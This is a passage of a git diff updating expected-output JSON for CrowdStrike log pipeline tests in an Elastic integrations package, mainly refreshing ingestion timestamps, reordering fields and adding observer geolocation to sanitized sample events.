"2021-12-09T13:36:08.382662800Z", + "ingested": "2021-12-14T14:41:23.505204541Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 4,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601312140,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"requestResetPassword\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601312140,\n \"AuditKeyValues\": [\n {\n \"Key\": \"target_name\",\n \"ValueString\": \"alice@company.com\"\n }\n ]\n }\n}", "category": [ "authentication" @@ -395,6 +391,7 @@ "kind": "event", "outcome": "success" }, + "message": "CrowdStrike Authentication", "crowdstrike": { "event": { "UserIp": "192.168.6.8", @@ -421,16 +418,12 @@ "user": { "name": "alice@company.com", "email": "alice@company.com" - } - }, - { - "source": { - "ip": "192.168.6.8" }, - "message": "CrowdStrike Authentication", "tags": [ "preserve_original_event" - ], + ] + }, + { "event.action": "two_factor_authenticate", "@timestamp": "2020-02-13T13:42:21.730Z", "ecs": { @@ -444,8 +437,11 @@ "192.168.6.8" ] }, + "source": { + "ip": "192.168.6.8" + }, "event": { - "ingested": "2021-12-09T13:36:08.382667Z", + "ingested": "2021-12-14T14:41:23.505204919Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 5,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601341730,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"twoFactorAuthenticate\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601341730\n }\n}", "category": [ "authentication" @@ -456,6 +452,7 @@ "kind": "event", "outcome": "success" }, + "message": "CrowdStrike Authentication", "crowdstrike": { "event": { "UTCTimestamp": "2020-02-13T13:42:21.730Z", @@ -476,16 +473,12 @@ "user": { "name": "alice@company.com", "email": "alice@company.com" - } - }, - { - "source": { - "ip": "192.168.6.8" }, - "message": "CrowdStrike Authentication", "tags": [ "preserve_original_event" - ], + ] + }, + { "event.action": "change_password", "@timestamp": "2020-02-13T13:45:20.236Z", "ecs": { @@ -499,8 +492,11 @@ "192.168.6.8" ] }, + "source": { + "ip": "192.168.6.8" + }, "event": { - "ingested": "2021-12-09T13:36:08.382671300Z", + "ingested": "2021-12-14T14:41:23.505205308Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 6,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601520236,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"changePassword\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601520236,\n \"AuditKeyValues\": [\n {\n \"Key\": \"target_name\",\n \"ValueString\": \"first.last@company.com\"\n }\n ]\n }\n}", "category": [ "authentication" @@ -511,6 +507,7 @@ "kind": "event", "outcome": "success" }, + "message": "CrowdStrike Authentication", "crowdstrike": { "event": { "UserIp": "192.168.6.8", @@ -537,16 +534,12 @@ "user": { "name": "alice@company.com", "email": "alice@company.com" - } - }, - { - "source": { - "ip": "192.168.6.8" }, - "message": "CrowdStrike Authentication", "tags": [ "preserve_original_event" - ], + ] + }, + { "event.action": "user_authenticate", "@timestamp": "2020-02-13T13:46:12.362Z", "ecs": { @@ -560,8 +553,11 @@ "192.168.6.8" ] }, + "source": { + "ip": "192.168.6.8" + }, "event": { - "ingested": "2021-12-09T13:36:08.382674800Z", + "ingested": "2021-12-14T14:41:23.505205689Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 7,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601572362,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"userAuthenticate\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601572362\n }\n}", "category": [ "authentication" @@ -572,6 +568,7 @@ "kind": "event", "outcome": "success" }, + "message": "CrowdStrike Authentication", "crowdstrike": { "event": { "UTCTimestamp": "2020-02-13T13:46:12.362Z", @@ -592,16 +589,12 @@ "user": { "name": "alice@company.com", "email": "alice@company.com" - } - }, - { - "source": { - "ip": "192.168.6.8" }, - "message": "CrowdStrike Authentication", "tags": [ "preserve_original_event" - ], + ] + }, + { "event.action": "two_factor_authenticate", "@timestamp": "2020-02-13T13:50:14.754Z", "ecs": { @@ -615,8 +608,11 @@ "192.168.6.8" ] }, + "source": { + "ip": "192.168.6.8" + }, "event": { - "ingested": "2021-12-09T13:36:08.382679300Z", + "ingested": "2021-12-14T14:41:23.505206073Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 8,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601814754,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"twoFactorAuthenticate\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601814754\n }\n}", "category": [ "authentication" @@ -627,6 +623,7 @@ "kind": "event", "outcome": "success" }, + "message": "CrowdStrike Authentication", "crowdstrike": { "event": { "UTCTimestamp": "2020-02-13T13:50:14.754Z", @@ -647,16 +644,12 @@ "user": { "name": "alice@company.com", "email": "alice@company.com" - } - }, - { - "source": { - "ip": "192.168.6.8" }, - "message": "CrowdStrike Authentication", "tags": [ "preserve_original_event" - ], + ] + }, + { "event.action": "self_accept_eula", "@timestamp": "2020-02-13T13:50:20.289Z", "ecs": { @@ -670,8 +663,11 @@ "192.168.6.8" ] }, + "source": { + "ip": "192.168.6.8" + }, "event": { - "ingested": "2021-12-09T13:36:08.382685300Z", + "ingested": "2021-12-14T14:41:23.505206649Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 9,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601820289,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"selfAcceptEula\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601820289\n }\n}", "category": [ "authentication" @@ -682,6 +678,7 @@ "kind": "event", "outcome": "success" }, + "message": "CrowdStrike Authentication", "crowdstrike": { "event": { "UTCTimestamp": "2020-02-13T13:50:20.289Z", @@ -702,7 +699,10 @@ "user": { "name": "alice@company.com", "email": "alice@company.com" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "@timestamp": "2020-02-13T14:14:22.000Z", @@ -721,7 +721,7 @@ "ip": "192.168.6.8" }, "event": { - "ingested": "2021-12-09T13:36:08.382690900Z", + "ingested": "2021-12-14T14:41:23.505207042Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 10,\n \"eventType\": \"UserActivityAuditEvent\",\n \"eventCreationTime\": 1581603262000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"detection_update\",\n \"ServiceName\": \"detections\",\n \"AuditKeyValues\": [\n {\n \"Key\": \"detection_id\",\n \"ValueString\": \"ldt:5a6fd0b7347440cd74cb84855a8aee18:17180539745\"\n },\n {\n \"Key\": \"new_state\",\n \"ValueString\": \"in_progress\"\n },\n {\n \"Key\": \"assigned_to\",\n \"ValueString\": \"First Last\"\n },\n {\n \"Key\": \"assigned_to_uid\",\n \"ValueString\": \"first.last@company.com\"\n }\n ],\n \"UTCTimestamp\": 1581603262\n }\n}", "kind": "event", "action": "user_activity_audit_event", diff --git a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-events.log-expected.json b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-events.log-expected.json index 6be007be91c..825d1331df8 100644 --- a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-events.log-expected.json +++ b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-events.log-expected.json @@ -62,7 +62,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:36:09.420125Z", + "ingested": "2021-12-14T14:41:24.741364419Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 294564,\n \"eventType\": \"DetectionSummaryEvent\",\n \"eventCreationTime\": 1582101000000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"ProcessStartTime\": 1536846339,\n \"ProcessEndTime\": 0,\n \"ProcessId\": 38684386611,\n \"ParentProcessId\": 38682494050,\n \"ComputerName\": \"alice-laptop\",\n \"UserName\": \"alice\",\n \"DetectName\": \"Process Terminated\",\n \"DetectDescription\": \"Terminated a process related to the deletion of backups, which is often indicative of ransomware activity.\",\n \"Severity\": 4,\n \"SeverityName\": \"High\",\n \"FileName\": \"explorer.exe\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume1\\\\Windows\",\n \"CommandLine\": \"C:\\\\Windows\\\\Explorer.EXE\",\n \"SHA256String\": \"6a671b92a69755de6fd063fcbe4ba926d83b49f78c42dbaeed8cdb6bbc57576a\",\n \"MD5String\": \"ac4c51eb24aa95b77f705ab159189e24\",\n \"MachineDomain\": \"CORP-DOMAIN\",\n \"FalconHostLink\": \"https://falcon.crowdstrike.com/ec86abd353824e96765ecbe18eb4f0b4\",\n \"SensorId\": \"7c808b4c8878433287eea53d4a8c3268\",\n \"DetectId\": \"ldt:ec86abd353824e96765ecbe18eb4f0b4:38655257584\",\n \"LocalIP\": \"192.168.12.51\",\n \"MACAddress\": \"00-00-00-11-22-33\",\n \"Tactic\": \"Malware\",\n \"Technique\": \"Ransomware\",\n \"Objective\": \"Falcon Detection Method\",\n \"PatternDispositionDescription\": \"Prevention, process killed.\",\n \"PatternDispositionValue\": 16,\n \"PatternDispositionFlags\": {\n \"Indicator\": false,\n \"Detect\": false,\n \"InddetMask\": false,\n \"SensorOnly\": false,\n \"Rooting\": false,\n \"KillProcess\": true,\n \"KillSubProcess\": false,\n \"QuarantineMachine\": false,\n \"QuarantineFile\": false,\n \"PolicyDisabled\": false,\n \"KillParent\": false,\n \"OperationBlocked\": false,\n \"ProcessBlocked\": false\n }\n }\n}", "kind": "alert", "action": "Prevention, process killed.", @@ -141,7 +141,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:36:09.420134300Z", + "ingested": "2021-12-14T14:41:24.741367019Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 1824,\n \"eventType\": \"IncidentSummaryEvent\",\n \"eventCreationTime\": 1583295476766,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"IncidentStartTime\": 1583295228,\n \"IncidentEndTime\": 1583295470,\n \"FalconHostLink\": \"https://falcon.crowdstrike.com/crowdscore/incidents/details/inc:8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"State\": \"open\",\n \"FineScore\": 1.2\n }\n}", "kind": "alert", "action": "incident", @@ -186,7 +186,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:09.420138700Z", + "ingested": "2021-12-14T14:41:24.741367511Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 22865,\n \"eventType\": \"UserActivityAuditEvent\",\n \"eventCreationTime\": 1593186952000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"Crowdstrike\",\n \"UserIp\": \"\",\n \"OperationName\": \"quarantined_file_update\",\n \"ServiceName\": \"quarantined_files\",\n \"AuditKeyValues\": [\n {\n \"Key\": \"quarantined_file_id\",\n \"ValueString\": \"35b35a53da374816a6b471cf09e12019_a076d3121743755f2d4f8d4d5807f0bc013177f7847d09b48e76de88ace08c78\"\n },\n {\n \"Key\": \"action_taken\",\n \"ValueString\": \"quarantined\"\n }\n ],\n \"UTCTimestamp\": 1593186952\n }\n}", "kind": "event", "action": "user_activity_audit_event", diff --git a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log-expected.json b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log-expected.json index b7a41c8d63e..d2bd9e67b00 100644 --- a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log-expected.json +++ b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log-expected.json @@ -43,7 +43,7 @@ "name": "TESTDEVICE01" }, "event": { - "ingested": "2021-12-09T13:36:09.744769800Z", + "ingested": "2021-12-14T14:41:25.113534666Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 70689,\n \"eventType\": \"FirewallMatchEvent\",\n \"eventCreationTime\": 1595248906000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"DeviceId\": \"718af202ab2c4ba5b6a5d10d39c0e0a5\",\n \"CustomerId\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"Ipv\": \"ipv4\",\n \"CommandLine\": \"\",\n \"ConnectionDirection\": \"1\",\n \"EventType\": \"FirewallRuleIP4Matched\",\n \"Flags\": {\n \"Audit\": false,\n \"Log\": false,\n \"Monitor\": true\n },\n \"HostName\": \"TESTDEVICE01\",\n \"ICMPCode\": \"\",\n \"ICMPType\": \"\",\n \"ImageFileName\": \"\",\n \"LocalAddress\": \"10.37.60.194\",\n \"LocalPort\": \"445\",\n \"MatchCount\": 1,\n \"MatchCountSinceLastReport\": 1,\n \"NetworkProfile\": \"2\",\n \"PID\": \"206158879910\",\n \"PolicyName\": \"PROD-FW-Workstations-General\",\n \"PolicyID\": \"74e7f1552a3a4d90a6d65578642c8584\",\n \"Protocol\": \"6\",\n \"RemoteAddress\": \"10.37.60.21\",\n \"RemotePort\": \"54952\",\n \"RuleAction\": \"2\",\n \"RuleDescription\": \"\",\n \"RuleFamilyID\": \"fec73e96a1bf4481be582c3f89b234fa\",\n \"RuleGroupName\": \"SMB Rules\",\n \"RuleName\": \"Inbound SMB Block \\u0026 Log Private\",\n \"RuleId\": \"4877172638743447345\",\n \"Status\": \"\",\n \"Timestamp\": \"2020-07-20T12:41:44Z\",\n \"TreeID\": \"\"\n }\n}", "code": "FirewallRuleIP4Matched", "kind": "event", @@ -108,7 +108,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:36:09.744778800Z", + "ingested": "2021-12-14T14:41:25.113536820Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 57181,\n \"eventType\": \"IncidentSummaryEvent\",\n \"eventCreationTime\": 1595005328414,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"IncidentStartTime\": 1595005316,\n \"IncidentEndTime\": 1595005316,\n \"FalconHostLink\": \"https://falcon.crowdstrike.com/crowdscore/incidents/details/inc:1234567893cd4e55b3a832ba2140478e:72e291e40c1544d390eabf135d875e54\",\n \"State\": \"open\",\n \"FineScore\": 0.1,\n \"LateralMovement\": 0\n }\n}", "kind": "alert", "action": "incident", @@ -144,13 +144,6 @@ ] }, { - "source": { - "ip": "67.43.156.15" - }, - "message": "Crowdstrike Authentication", - "tags": [ - "preserve_original_event" - ], "event.action": "saml2_assert", "@timestamp": "2020-07-20T12:26:10.093Z", "ecs": { @@ -164,8 +157,11 @@ "67.43.156.15" ] }, + "source": { + "ip": "67.43.156.15" + }, "event": { - "ingested": "2021-12-09T13:36:09.744784800Z", + "ingested": "2021-12-14T14:41:25.113537270Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 70509,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1595247970093,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"first.last@company.com\",\n \"UserIp\": \"67.43.156.15\",\n \"OperationName\": \"saml2Assert\",\n \"ServiceName\": \"Crowdstrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1595247970,\n \"AuditKeyValues\": [\n {\n \"Key\": \"trace_id\",\n \"ValueString\": \"b0b33836-555c-4e0e-a5ef-d368f6799f6b\"\n },\n {\n \"Key\": \"actor_user\",\n \"ValueString\": \"first.last@company.com\"\n },\n {\n \"Key\": \"actor_user_uuid\",\n \"ValueString\": \"123ab123-abc1-12a1-12a1-12a1ab12a1a1\"\n },\n {\n \"Key\": \"actor_cid\",\n \"ValueString\": \"123456a1ab1a12abc12ab1234abcd12a\"\n },\n {\n \"Key\": \"target_user\",\n \"ValueString\": \"first.last@company.com\"\n }\n ]\n }\n}", "category": [ "authentication" @@ -176,6 +172,7 @@ "kind": "event", "outcome": "success" }, + "message": "Crowdstrike Authentication", "crowdstrike": { "event": { "UserIp": "67.43.156.15", @@ -218,7 +215,10 @@ "user": { "name": "first.last@company.com", "email": "first.last@company.com" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "@timestamp": "2020-07-20T12:41:25.000Z", @@ -231,7 +231,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:09.744790600Z", + "ingested": "2021-12-14T14:41:25.113537663Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 70683,\n \"eventType\": \"UserActivityAuditEvent\",\n \"eventCreationTime\": 1595248885000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"Crowdstrike\",\n \"UserIp\": \"\",\n \"OperationName\": \"quarantined_file_update\",\n \"ServiceName\": \"quarantined_files\",\n \"AuditKeyValues\": [\n {\n \"Key\": \"quarantined_file_id\",\n \"ValueString\": \"ab1cde05567b455b93afbe2d3df352c9_328024a065630f897f09963d4b67b0c95d4054f540c2ca8014d5b012718bfa21\"\n },\n {\n \"Key\": \"action_taken\",\n \"ValueString\": \"quarantined\"\n }\n ],\n \"UTCTimestamp\": 1595248885\n }\n}", "kind": "event", "action": "user_activity_audit_event", @@ -293,7 +293,7 @@ "name": "TESTDEVICE01" }, "event": { - "ingested": "2021-12-09T13:36:09.744796500Z", + "ingested": "2021-12-14T14:41:25.113538062Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 57217,\n \"eventType\": \"RemoteResponseSessionStartEvent\",\n \"eventCreationTime\": 1595006093000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"SessionId\": \"330633db-1cda-4355-b0d8-2c2edc91fe3e\",\n \"HostnameField\": \"TESTDEVICE01\",\n \"UserName\": \"first.last@company.com\",\n \"StartTimestamp\": 1595006093\n }\n}", "kind": "event", "action": [ @@ -349,7 +349,7 @@ "name": "TESTDEVICE01" }, "event": { - "ingested": "2021-12-09T13:36:09.744802300Z", + "ingested": "2021-12-14T14:41:25.113538445Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 57269,\n \"eventType\": \"RemoteResponseSessionEndEvent\",\n \"eventCreationTime\": 1595006899000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"SessionId\": \"330633db-1cda-4355-b0d8-2c2edc91fe3e\",\n \"HostnameField\": \"TESTDEVICE01\",\n \"UserName\": \"first.last@company.com\",\n \"EndTimestamp\": 1595006899,\n \"Commands\": [\n \"cd \\\\Program Files (x86)\\\\Symantec\",\n \"ls .\",\n \"cd \\\\Program Files (x86)\",\n \"ls .\",\n \"reg query HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CrowdStrike\\\\{9b03c1d9-3138-44ed-9fae-d9f4c034b88d}\\\\{16e0423f-7058-48c9-a204-725362b67639}\\\\Default\",\n \"reg set HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CrowdStrike\\\\{9b03c1d9-3138-44ed-9fae-d9f4c034b88d}\\\\{16e0423f-7058-48c9-a204-725362b67639}\\\\Default GroupingTags -ValueType=```REG_SZ``` -Value=```Protect```\",\n \"reg query HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CrowdStrike\\\\{9b03c1d9-3138-44ed-9fae-d9f4c034b88d}\\\\{16e0423f-7058-48c9-a204-725362b67639}\\\\Default\",\n \"restart\",\n \"restart -Confirm\"\n ]\n }\n}", "kind": "event", "action": [ @@ -466,7 +466,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:09.744808Z", + "ingested": "2021-12-14T14:41:25.113538836Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 57047,\n \"eventType\": \"DetectionSummaryEvent\",\n \"eventCreationTime\": 1595002291000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"ProcessStartTime\": 1595002290,\n \"ProcessEndTime\": 1595002290,\n \"ProcessId\": 663790158277,\n \"ParentProcessId\": 627311656469,\n \"ComputerName\": \"TESTDEVICE01\",\n \"UserName\": \"First.last\",\n \"DetectName\": \"NGAV\",\n \"DetectDescription\": \"This file meets the machine learning-based on-sensor AV protection's low confidence threshold for malicious files.\",\n \"Severity\": 2,\n \"SeverityName\": \"Low\",\n \"FileName\": \"filename.exe\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\ProgramData\\\\file\\\\path\",\n \"CommandLine\": \"\\\"C:\\\\ProgramData\\\\file\\\\path\\\\filename.exe\\\" \",\n \"SHA256String\": \"0a123b185f9a32fde1df59897089014c92e3d08a0533b54baa72ba2a93d64deb\",\n \"MD5String\": \"0ab1235adca04aef6239f5496ef0a5df\",\n \"SHA1String\": \"0000000000000000000000000000000000000000\",\n \"MachineDomain\": \"NA\",\n \"ExecutablesWritten\": [\n {\n \"Timestamp\": 1595002290,\n \"FileName\": \"NEURO_200_J1939Configuration.mexw64\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\ProgramData\\\\file\\\\path\\\\is\\\\right\\\\here\\\\folder\"\n },\n {\n \"Timestamp\": 1595002290,\n \"FileName\": \"NEURO_200_J1939Configuration.mexw64\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\ProgramData\\\\file\\\\path\\\\is\\\\right\\\\here\\\\folder\"\n },\n {\n \"Timestamp\": 1595002290,\n \"FileName\": \"NEURO_200_J1939CanPackMessage.mexw64\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\ProgramData\\\\file\\\\path\\\\is\\\\right\\\\here\\\\folder\"\n },\n {\n \"Timestamp\": 1595002290,\n \"FileName\": \"NEURO_200_J1939CanPackMessage.mexw64\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\ProgramData\\\\file\\\\path\\\\is\\\\right\\\\here\\\\folder\"\n }\n ],\n \"FalconHostLink\": \"https://falcon.crowdstrike.com/activity/detections/detail/1abcd2345b8c4151a0cb45dcfbe6d3d0/124559902719?_cid=12345a1bc2d34fghi56jk7890lmno12p\",\n \"SensorId\": \"1abcd2345b8c4151a0cb45dcfbe6d3d0\",\n \"IOCType\": \"hash_sha256\",\n \"IOCValue\": \"0a123b185f9a32fde1df59897089014c92e3d08a0533b54baa72ba2a93d64deb\",\n \"DetectId\": \"ldt:1abcd2345b8c4151a0cb45dcfbe6d3d0:124559902719\",\n \"LocalIP\": \"10.1.190.117\",\n \"MACAddress\": \"54-ad-d4-d2-a8-0b\",\n \"Tactic\": \"Machine Learning\",\n \"Technique\": \"Sensor-based ML\",\n \"Objective\": \"Falcon Detection Method\",\n \"PatternDispositionDescription\": \"Detection, process would have been blocked if related prevention policy setting was enabled.\",\n \"PatternDispositionValue\": 2304,\n \"PatternDispositionFlags\": {\n \"Indicator\": false,\n \"Detect\": false,\n \"InddetMask\": false,\n \"SensorOnly\": false,\n \"Rooting\": false,\n \"KillProcess\": false,\n \"KillSubProcess\": false,\n \"QuarantineMachine\": false,\n \"QuarantineFile\": false,\n \"PolicyDisabled\": true,\n \"KillParent\": false,\n \"OperationBlocked\": false,\n \"ProcessBlocked\": true,\n \"RegistryOperationBlocked\": false,\n \"CriticalProcessDisabled\": false,\n \"BootupSafeguardEnabled\": false,\n \"FsOperationBlocked\": false\n },\n \"ParentImageFileName\": \"\\\\Device\\\\HarddiskVolume2\\\\Windows\\\\explorer.exe\",\n \"ParentCommandLine\": \"C:\\\\Windows\\\\Explorer.EXE\",\n \"GrandparentImageFileName\": \"\\\\Device\\\\HarddiskVolume2\\\\Windows\\\\System32\\\\userinit.exe\",\n \"GrandparentCommandLine\": \"C:\\\\Windows\\\\system32\\\\userinit.exe\"\n }\n}", "kind": "alert", "action": "Detection, process would have been blocked if related prevention policy setting was enabled.", diff --git a/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json b/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json index bd9effe6e83..2ecf75d415a 100644 --- a/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json +++ b/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json @@ -27,12 +27,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffa63e404bba4bff7465ab3afb", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffa63e404bba4bff7465ab3afb", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:21.137Z", "ecs": { @@ -50,7 +59,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150573500Z", + "ingested": "2021-12-14T14:41:26.533745830Z", "original": "{\"ParentProcessId\":\"362225661973273550\",\"SourceProcessId\":\"362225661973273550\",\"aip\":\"67.43.156.14\",\"SessionProcessId\":\"363970027584976556\",\"SyntheticPR2Flags\":\"8\",\"event_platform\":\"Mac\",\"SVUID\":\"501\",\"id\":\"ffffffff-1111-11eb-8dd4-061759968cdf\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677521162\",\"ProcessGroupId\":\"363970027584976556\",\"event_simpleName\":\"SyntheticProcessRollup2\",\"RawProcessId\":\"9505\",\"ContextTimeStamp\":\"1625677521.137\",\"GID\":\"20\",\"ConfigStateHash\":\"1620585913\",\"SVGID\":\"20\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"501\",\"CommandLine\":\"/bin/sh -s unix:cmd\",\"TargetProcessId\":\"363970027584976556\",\"ImageFileName\":\"/bin/sh\",\"RGID\":\"501\",\"SourceThreadId\":\"0\",\"Entitlements\":\"15\",\"name\":\"SyntheticProcessRollup2MacV3\",\"RUID\":\"501\",\"aid\":\"ffffffffa63e404bba4bff7465ab3afb\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:21.162Z", "kind": "event", @@ -87,6 +96,23 @@ } }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "vendor": "crowdstrike", + "ip": "67.43.156.14", + "serial_number": "ffffffff3c0846978560dbc0048d6555", + "type": "agent", + "version": "1007.4.0013701.1" + }, "process": { "entity_id": "365053603452626914", "pid": 33454, @@ -94,24 +120,10 @@ "id": 0 } }, + "@timestamp": "2021-07-07T17:05:23.068Z", "os": { "type": "macos" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffff3c0846978560dbc0048d6555", - "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", - "vendor": "crowdstrike", - "ip": "67.43.156.14" - }, - "@timestamp": "2021-07-07T17:05:23.068Z", "ecs": { "version": "1.12.0" }, @@ -127,7 +139,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150583Z", + "ingested": "2021-12-14T14:41:26.533748610Z", "original": 